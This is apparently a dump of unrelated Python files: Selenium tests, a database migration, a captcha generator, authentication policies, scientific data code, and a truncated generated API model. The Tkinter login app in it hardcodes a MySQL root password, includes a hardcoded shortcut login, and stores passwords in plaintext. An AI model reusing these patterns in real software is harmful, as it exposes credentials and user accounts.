wd.find_element_by_name("group_header").click()
wd.find_element_by_name("group_header").clear()
wd.find_element_by_name("group_header").send_keys(group.name)
wd.find_element_by_name("group_header").click()
wd.find_element_by_name("group_header").clear()
wd.find_element_by_name("group_header").send_keys(group.header)
wd.find_element_by_name("group_footer").click()
wd.find_element_by_name("group_footer").clear()
wd.find_element_by_name("group_footer").send_keys(group.footer)
# submit group creation
wd.find_element_by_name("submit").click()
self.return_to_group_page()
def return_to_group_page(self):
wd = self.wd
wd.find_element_by_link_text("group page").click()
def logout(self):
wd = self.wd
wd.find_element_by_link_text("Wyloguj się").click()
def destroy(self):
self.wd.quit()
|
python
|
"""protected and listed fields on Location
Revision ID: f8c342997aab
Revises: 5df6df91a533
Create Date: 2021-02-02 11:10:09.250494
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'f8c342997aab'
down_revision = '5df6df91a533'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('location', sa.Column('listed', sa.Boolean(), nullable=True))
op.add_column('location', sa.Column('protected', sa.Boolean(), nullable=True))
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_column('location', 'protected')
op.drop_column('location', 'listed')
# ### end Alembic commands ###
|
python
|
#!/usr/bin/python
# -*- coding: UTF-8 -*-
from click_captcha import ClickCaptcha
import fire
import sys
import codecs
sys.stdout = codecs.getwriter("utf-8")(sys.stdout.detach())
sys.stdout.write("Your content....")
def main(app_name, count=300, enable_dummy_word=False, font_path="extend/msyh.ttf", word_list_file_path="extend/chinese_word.json"):
"""
功能: 生成点选验证码图片
:param app_name: str <应用名称>
:param count: int <文件数量>: 默认是300
:param enable_dummy_word: str <是否生成虚拟干扰的文字>: 默认是False
:param font_path: str <字体路径>: 默认为 `extend/msyh.ttf`
:param word_list_file_path: str <字典映射文件路径>: 默认为 `extend/chinese_word.json`
:return:None
"""
# 创建对象
c = ClickCaptcha()
c.font_settings(word_size=32, font_path=font_path, word_list_file_path=word_list_file_path)
# 配置开关
c.enable_add_text = True # 添加文字
c.enable_dummy_word = enable_dummy_word # 添加虚构文字对象
# 批量保存
c.template_path = "extend/exp.xml"
c.save_img_dir = "app/{}/images_data/JPEGImages".format(app_name)
c.save_label_dir = "app/{}/images_data/Annotations".format(app_name)
c.create_image_by_batch(count)
print("Template is from {}".format(c.template_path))
print("Generate {} images on {}".format(count, c.save_img_dir))
print("Generate {} .xml label files on {}".format(count, c.save_label_dir))
if __name__ == '__main__':
fire.Fire(main)
|
python
|
from __future__ import absolute_import, print_function, unicode_literals
import sys
import binascii
import base64
from zope.interface import implementer
from pyramid.interfaces import IAuthenticationPolicy
from pyramid.authentication import CallbackAuthenticationPolicy, \
AuthTktAuthenticationPolicy
from pyshop.models import DBSession, User
from pyshop.compat import unicode
@implementer(IAuthenticationPolicy)
class AuthBasicAuthenticationPolicy(CallbackAuthenticationPolicy):
def __init__(self, callback=None):
self.callback = callback
def authenticated_userid(self, request):
auth = request.environ.get('HTTP_AUTHORIZATION')
try:
authmeth, auth = auth.split(' ', 1)
except AttributeError as ValueError: # not enough values to unpack
return None
if authmeth.lower() != 'basic':
return None
try:
# Python 3's string is already unicode
auth = base64.b64decode(auth.strip())
except binascii.Error: # can't decode
return None
if not isinstance(auth, unicode):
auth = auth.decode('utf-8')
try:
login, password = auth.split(':', 1)
except ValueError: # not enough values to unpack
return None
if User.by_credentials(DBSession(), login, password):
return login
return None
def unauthenticated_userid(self, request):
return self.authenticated_userid(request)
def remember(self, request, principal, **kw):
return []
def forget(self, request):
return []
@implementer(IAuthenticationPolicy)
class RouteSwitchAuthPolicy(CallbackAuthenticationPolicy):
def __init__(self, secret='key',callback=None):
try:
authtk = AuthTktAuthenticationPolicy(secret,
callback=callback,
hashalg='sha512')
except TypeError:
# pyramid < 1.4
authtk = AuthTktAuthenticationPolicy(secret, callback=callback)
self.impl = {'basic': AuthBasicAuthenticationPolicy(callback=callback),
'tk': authtk
}
self.callback = callback
def get_impl(self, request):
if request.matched_route and request.matched_route.name in (
'list_simple','show_simple',
'show_release_file','show_external_release_file',
'upload_releasefile'):
return self.impl['basic']
return self.impl['tk']
def authenticated_userid(self, request):
impl = self.get_impl(request)
return impl.authenticated_userid(request)
def unauthenticated_userid(self, request):
impl = self.get_impl(request)
return impl.unauthenticated_userid(request)
def remember(self, request, principal, **kw):
impl = self.get_impl(request)
return impl.remember(request, principal, **kw)
def forget(self, request, *args, **kw):
impl = self.get_impl(request)
return impl.forget(request, *args, **kw)
|
python
|
import indicators.indicator_settings as indicator_settings
settings = indicator_settings.global_settings['VAR_LB']
table_name = "VAR_LB"
for i in list(settings.keys()):
table_name += "_" + str(settings[i])
settings.update(
{
'db_path' : indicator_settings.indicators_root_path + "/var_lb/var_lb_db.sqlite",
'table_list' : (
['timestamp', 'INT', 'NOT NULL'],
['close', 'FLOAT(5,4)' , 'NOT NULL'],
['apriori_var', 'FLOAT(5,4)' , 'NOT NULL'],
['aposteriori_mean', 'FLOAT(5,4)' , 'NOT NULL'],
['labels', 'INT' , 'NOT NULL'],
),
'update_tdiff' : 4096,
'table_name' : table_name
}
)
|
python
|
from tkinter import *
from tkinter import ttk
from PIL import Image, ImageTk
from tkinter import messagebox
import mysql.connector
from mymain import AAS
def main():
win = Tk()
app = Login_Window(win)
win.mainloop()
class Login_Window:
def __init__(self, root):
self.root = root
self.root.title("Login")
self.root.geometry("1550x800+0+0")
self.bg = ImageTk.PhotoImage(file=r"img\black.jpg")
lbl_bg = Label(self.root, image=self.bg)
lbl_bg.place(x=0, y=0, relwidth=1, relheight=1)
frame = Frame(self.root, bg="black")
frame.place(x=610, y=170, width=340, height=450)
img1 = Image.open( r"img\login1.jpg")
img1 = img1.resize((100, 100), Image.ANTIALIAS)
self.photoimage1 = ImageTk.PhotoImage(img1)
lblimg1 = Label(image=self.photoimage1, bg="black", borderwidth=0)
lblimg1.place(x=730, y=175, width=100, height=100)
get_str = Label(frame, text="Get Started", font=("times new roman", 20, "bold"), fg="white", bg="black")
get_str.place(x=95, y=100)
# Label
username = lbl = Label(frame, text="Username", font=("times new roman", 15, "bold"), fg="white", bg="black")
username.place(x=70, y=155)
self.txtuser = ttk.Entry(frame, font=("times new roman", 15, "bold"))
self.txtuser.place(x=40, y=180, width=270)
password = lbl = Label(frame, text="Password", font=("times new roman", 15, "bold"), fg="white", bg="black")
password.place(x=70, y=225)
self.txtpass = ttk.Entry(frame, font=("times new roman", 15, "bold"))
self.txtpass.place(x=40, y=250, width=270)
# ======Icon Images====================
img1p = Image.open(r"img\login.png")
img1p= img1p.resize((25, 25), Image.ANTIALIAS)
self.photoimage1p = ImageTk.PhotoImage(img1p)
lbling1 = Label(image=self.photoimage1p, bg="black", borderwidth=0)
lbling1.place(x=650, y=323, width=25, height=25)
img2 = Image.open(r"img\password.png")
img2 = img2.resize((25, 25), Image.ANTIALIAS)
self.photoimage2 = ImageTk.PhotoImage(img2)
lbling1 = Label(image=self.photoimage2, bg="black", borderwidth=0)
lbling1.place(x=650, y=395, width=25, height=25)
# LoginButton
loginbtn = Button(frame, command=self.login, text="Login", font=("times new roman", 15, "bold"),
bd=3, relief=RIDGE, fg="white", bg="red", activeforeground="white", activebackground="red")
loginbtn.place(x=110, y=300, width=120, height=35)
# RegisterButton
registerbtn = Button(frame, text="New User Register", command=self.register_window, font=(
"times new roman", 10, "bold"), borderwidth=0, relief=RIDGE, fg="white", bg="black", activeforeground="white", activebackground="black")
registerbtn.place(x=15, y=350, width=160)
# forgetpasswordbutton
forgetpassbtn = Button(frame, text="Forget Password", command=self.forget_password_window, font=(
"times new roman", 10, "bold"), borderwidth=0, relief=RIDGE, fg="white", bg="black", activeforeground="white", activebackground="black")
forgetpassbtn.place(x=10, y=370, width=160)
def register_window(self):
self.new_window = Toplevel(self.root)
self.app = Register(self.new_window)
def login(self):
if self.txtuser.get() == "" or self.txtpass.get() == "":
messagebox.showerror("Error", "All fields required")
elif self.txtuser.get() == "kapu" and self.txtpass.get == "ashu":
messagebox.showinfo("Success", "Welcome")
else:
conn = mysql.connector.connect(
host="localhost", user="root", password="Ektapalak25", database="face_recognizer")
my_cursor = conn.cursor()
my_cursor.execute("select * from register where email=%s and pass=%s", (
self.txtuser.get(),
self.txtpass.get()
))
row = my_cursor.fetchone()
if row == None:
messagebox.showerror("Error", "Invalid Username and Password")
else:
open_main = messagebox.askyesno("Yes No", "Access only admin")
if open_main > 0:
self.new_window = Toplevel(self.root)
self.app=AAS(self.new_window)
else:
if not open_main:
return
conn.commit()
conn.close()
# ==================Reset Password==================================
def reset_pass(self):
if self.combo_security_Q.get() == "Select":
messagebox.showerror("Error", "Select security question")
elif self.txt_security.get() == "":
messagebox.showerror("Error", "Please enter the answer")
elif self.txt_newpass.get() == "":
messagebox.showerror( "Error", "Please enter the new password")
else:
conn = mysql.connector.connect(host="localhost", user="root", password="Ektapalak25", database="face_recognizer")
my_cursor = conn.cursor()
query = ("Select * from register where email=%s and securityQ=%s and securityA=%s")
value = (self.txtuser.get(),
self.combo_security_Q.get(), self.txt_security.get())
my_cursor.execute(query, value)
row = my_cursor.fetchone()
if row == None:
messagebox.showerror("Error", "Please enter the correct answer")
else:
query = ("Update register set pass=%s where email=%s")
value = (self.txt_newpass.get(), self.txtuser.get())
my_cursor.execute(query, value)
conn.commit()
conn.close()
messagebox.showinfo("Info", "Your password has been reset successfully")
self.root2.destroy()
# ==================Forget Password Window================================
def forget_password_window(self):
if self.txtuser.get() == "":
messagebox.showerror("Error", "Please enter the Email address to reset password")
else:
conn = mysql.connector.connect(host="localhost", user="root", password="Ektapalak25", database="face_recognizer")
my_cursor = conn.cursor()
query = ("Select * from register where email=%s")
value = (self.txtuser.get(),)
my_cursor.execute(query, value)
row = my_cursor.fetchone()
if row == None:
messagebox.showerror("Error", "Please enter the registered username")
else:
conn.close()
self.root2 = Toplevel()
self.root2.title("Forget Password")
self.root2.geometry("340x450+610+170")
l = Label(self.root2, text="Forget Password", font=("times new roman", 20, "bold"), fg="red", bg="white")
l.place(x=0, y=10, relwidth=1)
security_Q = Label(self.root2, text="Select security question", font=("times new roman", 15, "bold"), bg="white", fg="black")
security_Q.place(x=50, y=80)
self.combo_security_Q = ttk.Combobox(self.root2, font=("times new roman", 15, "bold"), state="readonly")
self.combo_security_Q["values"] = ("Select", "Your birth place", "Your best friend name", "Your pet name")
self.combo_security_Q.place(x=50, y=110, width=250)
self.combo_security_Q.current(0)
security_A = Label(self.root2, text="Security Answer", font=("times new roman", 15, "bold"), bg="white", fg="black")
security_A.place(x=50, y=150)
self.txt_security = ttk.Entry(self.root2, font=("times new roman", 15, "bold"))
self.txt_security.place(x=50, y=180, width=250)
new_password = Label(self.root2, text="New Password", font=("times new roman", 15, "bold"), bg="white", fg="black")
new_password.place(x=50, y=220)
self.txt_newpass = ttk.Entry(
self.root2, font=("times new roman", 15, "bold"))
self.txt_newpass.place(x=50, y=250, width=250)
btn = Button(self.root2, text="Reset",command=self.reset_pass ,font=( "times new roman", 15, "bold"), fg="white", bg="green")
btn.place(x=100, y=290)
class Register:
def __init__(self, root):
self.root = root
self.root.title("Register")
self.root.geometry("1600x900+0+0")
# ===========================variables==================================
self.var_fname = StringVar()
self.var_lname = StringVar()
self.var_contact = StringVar()
self.var_email = StringVar()
self.var_securityQ = StringVar()
self.var_SecurityA = StringVar()
self.var_pass = StringVar()
self.var_confpass = StringVar()
self.var_check = IntVar()
# ===============bg image================
self.bg = ImageTk.PhotoImage(file=r"img\black.jpg")
bg_lbl = Label(self.root, image=self.bg)
bg_lbl.place(x=0, y=0, relwidth=1, relheight=1)
# ===============left image================
self.bg1 = ImageTk.PhotoImage(file=r"img\register.gif")
left_lbl = Label(self.root, image=self.bg1)
left_lbl.place(x=50, y=100, width=470, height=550)
# ===============main frame=================
frame = Frame(self.root, bg="white")
frame.place(x=520, y=100, width=800, height=550)
register_lbl = Label(frame, text="REGISTER HERE", font=(
"times new roman", 20, "bold"), fg="darkgreen", bg="white")
register_lbl.place(x=20, y=20)
# ==============label and entry==============
# =============row1
fname = Label(frame, text="First Name", font=("times new roman", 15, "bold"), bg="white")
fname.place(x=50, y=100)
self.fname_entry = ttk.Entry( frame, textvariable=self.var_fname, font=("times new roman", 15, "bold"))
self.fname_entry.place(x=50, y=130, width=250)
l_name = Label(frame, text="Last Name", font=("times new roman", 15, "bold"), bg="white", fg="black")
l_name.place(x=370, y=100)
self.txt_lname = ttk.Entry(frame, textvariable=self.var_lname, font=("times new roman", 15))
self.txt_lname.place(x=370, y=130, width=250)
# ===============row2
contact = Label(frame, text="Contact No", font=("times new roman", 15, "bold"), bg="white", fg="black")
contact.place(x=50, y=170)
self.txt_contact = ttk.Entry(
frame, textvariable=self.var_contact, font=("times new roman", 15))
self.txt_contact.place(x=50, y=200, width=250)
email = Label(frame, text=("Email"), font=( "times new roman", 15, "bold"), bg="white", fg="black")
email.place(x=370, y=170)
self.txt_email = ttk.Entry(
frame, textvariable=self.var_email, font=("times new roman", 15))
self.txt_email.place(x=370, y=200, width=250)
# ================row3
security_Q = Label(frame, text="Select security question", font=( "times new roman", 15, "bold"), bg="white", fg="black")
security_Q.place(x=50, y=240)
self.combo_security_Q = ttk.Combobox(frame, textvariable=self.var_securityQ, font=("times new roman", 15, "bold"), state="readonly")
self.combo_security_Q["values"] = ("Select", "Your birth place", "Your best friend name", "Your pet name")
self.combo_security_Q.place(x=50, y=270, width=250)
self.combo_security_Q.current(0)
security_A = Label(frame, text="Security Answer", font=("times new roman", 15, "bold"), bg="white", fg="black")
security_A.place(x=370, y=240)
self.txt_security = ttk.Entry(
frame, textvariable=self.var_SecurityA, font=("times new roman", 15))
self.txt_security.place(x=370, y=270, width=250)
# =================row4
pswd = Label(frame, text="Password", font=("times new roman", 15, "bold"), bg="white", fg="black")
pswd.place(x=50, y=310)
self.txt_pswd = ttk.Entry(
frame, textvariable=self.var_pass, font=("times new roman", 15))
self.txt_pswd.place(x=50, y=340, width=250)
confirm_pswd = Label(frame, text="Confirm password", font=("times new roman", 15, "bold"), bg="white", fg="black")
confirm_pswd.place(x=370, y=310)
self.txt_confirm_pswd = ttk.Entry(
frame, textvariable=self.var_confpass, font=("times new roman", 15))
self.txt_confirm_pswd.place(x=370, y=340, width=250)
# ================check button=====================
checkbtn = Checkbutton(frame, variable=self.var_check, text="I Agree To The Terms & Conditions", font=("times new roman", 12, "bold"), onvalue=1, offvalue=0)
checkbtn.place(x=50, y=380)
# ===========================buttons===================================
img = Image.open("img\att2.jfif")
img = img.resize((200, 50), Image.ANTIALIAS)
self.photoimage = ImageTk.PhotoImage(img)
b1 = Button(frame, image=self.photoimage, command=self.register_data,borderwidth=0, cursor="hand2", font=("times new roman", 15, "bold"), fg="white")
b1.place(x=10, y=420, width=200)
img1l = Image.open("img\bg2.jfif")
img1l = img1l.resize((200, 50), Image.ANTIALIAS)
self.photoimage1l = ImageTk.PhotoImage(img1l)
b1 = Button(frame, image=self.photoimage1l, borderwidth=0,cursor="hand2", font=("times new roman", 15, "bold"), fg="white")
b1.place(x=330, y=420, width=200)
# =================function declaration=======================
def register_data(self):
if self.var_fname.get() == "" or self.var_email.get() == "" or self.var_securityQ.get == "Select":
messagebox.showerror("Error", "All fields are required")
elif self.var_pass.get() != self.var_confpass.get():
messagebox.showerror("Error", "password & confirm password must be same")
elif self.var_check.get() == 0:
messagebox.showerror("Error", "Please agree our terms and conditions")
else:
conn=mysql.connector.connect(host="localhost",username="root",password="Ektapalak25",database="face_recognizer")
my_cursor = conn.cursor()
query = ("select * from register where email=%s")
value = (self.var_email.get(),)
my_cursor.execute(query, value)
row = my_cursor.fetchone()
if row != None:
messagebox.showerror("Error", "User already exists, try another email")
else:
my_cursor.execute("insert into register values(%s,%s,%s,%s,%s,%s,%s)", (
self.var_fname.get(),
self.var_lname.get(),
self.var_contact.get(),
self.var_email.get(),
self.var_securityQ.get(),
self.var_SecurityA.get(),
self.var_pass.get()
))
conn.commit()
conn.close()
messagebox.showinfo("Success", "Register Successfully")
if __name__ == "__main__":
main()
|
python
|
import pytest
from tests.compiler import compile_base
from thinglang.compiler.errors import SelfInStaticMethod
SELF_USE_IN_STATIC_METHOD = '''
thing Program
has number n1
static does something
{}
'''
def test_direct_self_use_in_static_function():
with pytest.raises(SelfInStaticMethod):
compile_base(SELF_USE_IN_STATIC_METHOD.format('return self'))
with pytest.raises(SelfInStaticMethod):
compile_base(SELF_USE_IN_STATIC_METHOD.format('Console.print(self)'))
def test_self_dereference_in_static_function():
with pytest.raises(SelfInStaticMethod):
compile_base(SELF_USE_IN_STATIC_METHOD.format('self.n1'))
|
python
|
# -*- coding: utf-8 -*-
import struct
SIZE = "I"
SIZEB = "B"
def stringToByteList(txt):
byteList = list()
for to in range(0, len(txt), 8):
byteList.append(int(txt[to:to + 8], 2))
return byteList
def byteListToString(byteList):
txt = ""
for element in byteList:
txt = txt + bin(element)[2:].zfill(8)
return txt
def occurrenceToByteList(occurrence):
byteList = list()
for key in occurrence:
byteList.append(ord(key))
byteList.append(occurrence[key])
return byteList
def byteListToOccurrence(byteList):
occurrence = dict()
for index in range(0, len(byteList), 2):
occurrence[chr(byteList[index])] = byteList[index + 1]
return occurrence
def packData(output, occurrence):
pack = fillZeros(output)
sByte = stringToByteList(pack["output"])
oByte = occurrenceToByteList(occurrence)
sBytel = len(sByte)
oBytel = len(oByte)
buf = struct.pack(SIZEB, pack["filled"])
buf = buf + struct.pack(SIZE, sBytel)
buf = buf + struct.pack(SIZE, oBytel)
buf = buf + struct.pack(SIZEB * sBytel, *sByte)
buf = buf + struct.pack((SIZEB + SIZE) * (oBytel / 2), *oByte)
return buf
def unpackData(buf):
sizeb = struct.calcsize(SIZEB)
size = struct.calcsize(SIZE)
filled = struct.unpack(SIZEB, buf[:sizeb])[0]
buf = buf[sizeb:]
sBytel = struct.unpack(SIZE, buf[0:size])[0]
buf = buf[size:]
oBytel = struct.unpack(SIZE, buf[0:size])[0]
buf = buf[size:]
sByte = struct.unpack(SIZEB * sBytel, buf[:sizeb * sBytel])
buf = buf[sizeb * sBytel:]
oByte = struct.unpack((SIZEB + SIZE)
* (oBytel / 2), buf[:oBytel * size * sizeb])
return {
'output': stripZeros(byteListToString(sByte), filled)["output"],
'occurrence': byteListToOccurrence(oByte)
}
def fillZeros(txt):
tofill = 8 - (len(txt) % 8)
return {
'filled': tofill,
'output': txt + "0" * tofill
}
def stripZeros(txt, tostrip):
return {
'striped': tostrip,
'output': txt[: - tostrip]
}
def readBinaryToEncode(ifile):
txt = list()
byte = ifile.read(1)
while byte:
txt.append(byte)
byte = ifile.read(1)
return txt
def readBinaryToDecode(ifile):
return ifile.read()
|
python
|
#!/usr/bin/env python
# Import stuff for compatibility between python 2 and 3
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from builtins import str
from future import standard_library
import os
import numpy as np
import pyspextools.messages as message
from .region import Region
from .res import Res
from .spo import Spo
from .pha2 import Pha2
from .pha import Pha
from .rmf import Rmf
from .arf import Arf
from .convert import rmf_to_res
from .convert import pha_to_spo
standard_library.install_aliases()
class TGRegion(Region):
"""The TGRegion class contains methods to read Chandra grating data into the pyspextools module and convert
these to spo and res format objects."""
def __init__(self):
Region.__init__(self)
self.grating = '' #: Grating name
# -----------------------------------------------------
# Read a set of Chandra grating files into a region
# -----------------------------------------------------
def read_region(self, pha2file, rmflist, arflist, grating, bkgsubtract=True):
"""Add a Chandra spectrum and response to a SPEX region. The pha2 file and the rmf and arf file lists
are mandatory. The grating option can be either HETG, METG or LETG"""
self.grating = grating
# Read the PHA2 file for a particular grating
(src, bkg) = self.__read_pha2(pha2file, grating, bkgsubtract=bkgsubtract)
if not isinstance(src,Pha):
message.error("Failed to read spectrum file.")
return 1
# Convert the PHA2 file to spo
rmf = Rmf()
rmf.read(rmflist[0])
self.spo = pha_to_spo(src, rmf, back=bkg)
if not isinstance(self.spo,Spo):
message.error("Failed to convert spectrum file.")
return 1
# Convert the responses to res
self.res = self.__rmflist_to_res(rmflist, arflist)
if not isinstance(self.res,Res):
message.error("Failed to combine and convert response files.")
return 1
self.label = grating
return 0
def __read_pha2(self, pha2file, grating, bkgsubtract=True):
# Initialize PHA2 file type
spec = Pha2()
# Is the source spectrum there?
message.proc_start("Read source spectrum")
if os.path.isfile(pha2file):
stat = spec.read(pha2file,background=bkgsubtract)
if stat != 0:
message.proc_end(stat)
message.error("Failed to read source spectrum.")
return 1
else:
message.proc_end(stat)
else:
message.proc_end(1)
message.error("Spectrum file {0} not found in path.".format(pha2file))
return 1
# Convert grating name to number
if grating == 'HETG':
ngrating = 1
elif grating == 'METG':
ngrating = 2
elif grating == 'LETG':
ngrating = 3
else:
message.error("Unsupported grating: '{0}'.".format(grating))
return 1
# Combine spectra from a single grating
message.proc_start("Combining orders of the spectrum")
(src, bkg) = spec.combine_orders(ngrating)
if isinstance(src, Pha) and isinstance(bkg, Pha):
message.proc_end(0)
else:
message.proc_end(1)
return 1
return src, bkg
# -----------------------------------------------------
# Return a res object derived from Chandra grating data
# -----------------------------------------------------
def __rmflist_to_res(self, rmflist, arflist):
"""Convert a list of compatible rmf and arf file into one res file. This is convenient for combining responses
that are provided separately, like the Transmission Grating spectra from Chandra."""
if len(rmflist) != len(arflist):
message.error("ARF list and RMF list do not have the same length.")
return 0
rmfobjs = np.zeros(len(rmflist), dtype=object)
arfobjs = np.zeros(len(arflist), dtype=object)
rmf_orders = np.zeros(len(rmflist), dtype=int)
arf_orders = np.zeros(len(arflist), dtype=int)
i = 0
for file in rmflist:
message.proc_start("Reading response for order")
rmf = Rmf()
rmf.read(file)
rmf_orders[i] = rmf.Order
print(str(rmf_orders[i])+" ", end='')
if len(np.where(rmf_orders == rmf.Order)) != 1:
message.error("There are two response files with the same order.")
message.proc_end(1)
return 1
else:
rmfobjs[i] = rmf
message.proc_end(0)
i = i + 1
i=0
for file in arflist:
message.proc_start("Reading effective area for order")
arf = Arf()
arf.read(file)
arf_orders[i] = arf.Order
print(str(arf_orders[i])+" ", end='')
if len(np.where(arf_orders == arf.Order)) != 1:
message.error("There are two effective area files for the same order.")
message.proc_end(1)
return 1
else:
arfobjs[i] = arf
message.proc_end(0)
i = i + 1
arfsort = np.argsort(arf_orders)
rmfsort = np.argsort(rmf_orders)
# Calculate first response:
res = rmf_to_res(rmfobjs[rmfsort[0]],arf=arfobjs[arfsort[0]])
# Append the components from the other responses
for i in np.arange(len(rmfsort)-1)+1:
restmp = rmf_to_res(rmfobjs[rmfsort[i]],arf=arfobjs[arfsort[i]])
res.append_component(restmp)
return res
|
python
|
from selenium import webdriver
from training_ground_page import TrainingGroundPage
from trial_page import TrialPage
import warnings
warnings.filterwarnings("ignore", category=DeprecationWarning)
options = webdriver.ChromeOptions()
options.add_experimental_option('excludeSwitches', ['enable-logging'])
# Test Setup
browser = webdriver.Chrome(options=options)
# Test
trial_page = TrialPage(browser)
trial_page.go()
trial_page.stone_input.input_text('rock')
trial_page.stone_button.click()
#Training grounds
instruction_page = TrainingGroundPage(driver = browser)
instruction_page.go()
assert instruction_page.button1.text == 'Button1', 'Unexpected button1 text'
browser.quit()
##for training_ground_page.py import:
# instruction_page.type_into_input(test_value)
## instruction_page.click_button_1()
# text_from_input = instruction_page.get_input_text()
# assert text_from_input == test_value, f'Test Failed: Input did not match expected ({test_value}).'
# print('Test passed!')
|
python
|
import re
import subprocess
def read_model_list():
with open('latest_model_list.txt') as f:
return f.readlines()
records = read_model_list()
for record in records:
temp = re.search('test[0-9]+', record)
temp = temp.group(0)
temp = re.search('[0-9]+', temp)
test_map = temp.group(0)
args = []
model_info = record.replace('\n','').split(' ')
model_path = model_info[0] + '/' + model_info[1]
args.append('python')
args.append('test_neural_walker.py')
args.append('-seed')
args.append(str(12345 + int(test_map)))
args.append('-model_path')
args.append(model_path)
args.append('-test_map')
args.append(test_map)
args.append('-file_save')
args.append(record + 'txt')
subprocess.call(args)
|
python
|
# -*- coding: utf-8 -*-
#
# This file is part of EUDAT B2Share.
# Copyright (C) 2016 CERN.
#
# B2Share is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# B2Share is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with B2Share; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
#
# In applying this license, CERN does not
# waive the privileges and immunities granted to it by virtue of its status
# as an Intergovernmental Organization or submit itself to any jurisdiction.
"""B2Share deposit input loaders."""
from flask import abort, request
from invenio_rest.errors import RESTValidationError, FieldError
IMMUTABLE_PATHS = {
# fields added by the serializer
'/owners',
'/ePIC_PID',
'/DOI',
'/files',
# real fields
'/community',
'/$schema',
'/_pid',
'/_oai',
'/_files',
'/_deposit',
}
def check_patch_input_loader(record, immutable_paths):
data = request.get_json(force=True)
if data is None:
abort(400)
modified_fields = {cmd['path'] for cmd in data
if 'path' in cmd and 'op' in cmd and cmd['op'] != 'test'}
errors = [FieldError(field, 'The field "{}" is immutable.'.format(field))
for field in immutable_paths.intersection(modified_fields)]
if len(errors) > 0:
raise RESTValidationError(errors=errors)
return data
def deposit_patch_input_loader(record=None):
return check_patch_input_loader(record, IMMUTABLE_PATHS)
|
python
|
"""Apps module for the orp_api app."""
# Third Party
from django.apps import AppConfig
class OrpApiConfig(AppConfig):
"""Configuration for application."""
default_auto_field = 'django.db.models.BigAutoField'
name = 'orp_apps.orp_api'
|
python
|
# coding: utf-8
"""
Intersight REST API
This is Intersight REST API
OpenAPI spec version: 1.0.9-255
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class BiosPolicy(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'account_moid': 'str',
'ancestors': 'list[MoBaseMoRef]',
'create_time': 'datetime',
'mod_time': 'datetime',
'moid': 'str',
'object_type': 'str',
'owners': 'list[str]',
'parent': 'MoBaseMoRef',
'tags': 'list[MoTag]',
'version_context': 'MoVersionContext',
'description': 'str',
'name': 'str',
'adjacent_cache_line_prefetch': 'str',
'all_usb_devices': 'str',
'altitude': 'str',
'aspm_support': 'str',
'assert_nmi_on_perr': 'str',
'assert_nmi_on_serr': 'str',
'auto_cc_state': 'str',
'autonumous_cstate_enable': 'str',
'baud_rate': 'str',
'bme_dma_mitigation': 'str',
'boot_option_num_retry': 'str',
'boot_option_re_cool_down': 'str',
'boot_option_retry': 'str',
'boot_performance_mode': 'str',
'cbs_cmn_cpu_cpb': 'str',
'cbs_cmn_cpu_gen_downcore_ctrl': 'str',
'cbs_cmn_cpu_global_cstate_ctrl': 'str',
'cbs_cmn_cpu_l1stream_hw_prefetcher': 'str',
'cbs_cmn_cpu_l2stream_hw_prefetcher': 'str',
'cbs_cmn_determinism_slider': 'str',
'cbs_cmn_gnb_nb_iommu': 'str',
'cbs_cmn_mem_ctrl_bank_group_swap_ddr4': 'str',
'cbs_cmn_mem_map_bank_interleave_ddr4': 'str',
'cbs_cmnc_tdp_ctl': 'str',
'cbs_df_cmn_mem_intlv': 'str',
'cbs_df_cmn_mem_intlv_size': 'str',
'cdn_enable': 'str',
'cdn_support': 'str',
'channel_inter_leave': 'str',
'cke_low_policy': 'str',
'closed_loop_therm_throtl': 'str',
'cmci_enable': 'str',
'config_tdp': 'str',
'console_redirection': 'str',
'core_multi_processing': 'str',
'cpu_energy_performance': 'str',
'cpu_frequency_floor': 'str',
'cpu_performance': 'str',
'cpu_power_management': 'str',
'demand_scrub': 'str',
'direct_cache_access': 'str',
'dram_clock_throttling': 'str',
'dram_refresh_rate': 'str',
'energy_efficient_turbo': 'str',
'eng_perf_tuning': 'str',
'enhanced_intel_speed_step_tech': 'str',
'epp_profile': 'str',
'execute_disable_bit': 'str',
'extended_apic': 'str',
'flow_control': 'str',
'frb2enable': 'str',
'hardware_prefetch': 'str',
'hwpm_enable': 'str',
'imc_interleave': 'str',
'intel_hyper_threading_tech': 'str',
'intel_turbo_boost_tech': 'str',
'intel_virtualization_technology': 'str',
'intel_vt_for_directed_io': 'str',
'intel_vtd_coherency_support': 'str',
'intel_vtd_interrupt_remapping': 'str',
'intel_vtd_pass_through_dma_support': 'str',
'intel_vtdats_support': 'str',
'ioh_error_enable': 'str',
'ioh_resource': 'str',
'ip_prefetch': 'str',
'ipv6pxe': 'str',
'kti_prefetch': 'str',
'legacy_os_redirection': 'str',
'legacy_usb_support': 'str',
'llc_prefetch': 'str',
'lom_port0state': 'str',
'lom_port1state': 'str',
'lom_port2state': 'str',
'lom_port3state': 'str',
'lom_ports_all_state': 'str',
'lv_ddr_mode': 'str',
'make_device_non_bootable': 'str',
'memory_inter_leave': 'str',
'memory_mapped_io_above4gb': 'str',
'mirroring_mode': 'str',
'mmcfg_base': 'str',
'numa_optimized': 'str',
'onboard10gbit_lom': 'str',
'onboard_gbit_lom': 'str',
'onboard_scu_storage_support': 'str',
'onboard_scu_storage_sw_stack': 'str',
'organization': 'IamAccountRef',
'os_boot_watchdog_timer': 'str',
'os_boot_watchdog_timer_policy': 'str',
'os_boot_watchdog_timer_timeout': 'str',
'out_of_band_mgmt_port': 'str',
'package_cstate_limit': 'str',
'patrol_scrub': 'str',
'patrol_scrub_duration': 'str',
